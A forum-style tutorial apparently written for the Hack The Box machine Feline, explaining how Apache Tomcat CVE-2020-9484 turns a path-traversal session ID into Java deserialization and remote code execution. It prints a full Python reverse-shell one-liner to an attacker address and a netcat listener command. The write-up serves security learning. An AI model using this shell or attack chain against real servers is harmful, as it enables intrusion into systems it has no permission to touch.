Hi Guys,
I want to share a tutorial on the Apache Tomcat vulnerability CVE-2020-9484, based on my experience with the Hack The Box machine Feline.
This vulnerability affects the Tomcat branches below; every release older than the listed fixed version is impacted:
1. Apache Tomcat 10.x < 10.0.0-M5
2. Apache Tomcat 9.x < 9.0.35
3. Apache Tomcat 8.x < 8.5.55
4. Apache Tomcat 7.x < 7.0.104
In order to exploit this vulnerability, the following prerequisites must be met:
1. The PersistentManager is enabled (a Manager element with className org.apache.catalina.session.PersistentManager in the context configuration) and it uses a FileStore
2. The attacker can upload a file with arbitrary content, controls the filename, and knows the location on disk where the file is stored
3. There are gadgets on the classpath that can be used for a Java deserialization attack
The vulnerability
1. Tomcat asks the Manager to check whether a session with session ID “../../../../../../tmp/12345” exists
2. The Manager first checks whether it has that session in memory.
3. It does not, but the running Manager is a PersistentManager, so it also checks whether the session exists on disk.
4. It looks at directory + sessionid + ".session", which evaluates to “./session/../../../../../../tmp/12345.session”
5. If the file exists, Tomcat deserializes it and parses the session information from it; the session ID is never validated, so an attacker-controlled file at that path is deserialized as-is
The enumeration result below, taken from the server's error message, shows that the server uses Apache Commons FileUpload:

Next, let's analyze the error that leaked when we uploaded a file through the application: it reveals the absolute path on disk where the uploaded file was stored, which is exactly the location we need to build the JSESSIONID.
To exploit the vulnerability we perform the steps below. The goal is a reverse shell.
1. Create the shell.sh file that will be uploaded to the server. Its content is a Python reverse shell pointing at the attacker's listener (10.10.14.42:9090):
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.42",9090));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
2. Generate the serialized object file using ysoserial. The command embedded with the command below is executed on the target during deserialization; it transfers shell.sh from the attacker machine and saves it to /dev/shm/.

3. Upload the generated file to the server using the application's upload functionality.

4. Trigger the deserialization by sending a request whose JSESSIONID cookie is the path of the uploaded file without the .session suffix, preceded by enough ../ to escape the session directory.

5. shell.sh is now present on the server in /dev/shm.

6. Create a second serialized object that executes the uploaded /dev/shm/shell.sh.

7. Upload this second session file to the server so that it can be loaded by Java.

8. Trigger it again with the same JSESSIONID mechanism as in step 4.

Don't forget to start your netcat listener (nc -lvnp 9090) on the attacker machine before you execute step 8, so that it catches the reverse connection from the victim.
Resource: https://www.redtimmy.com/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/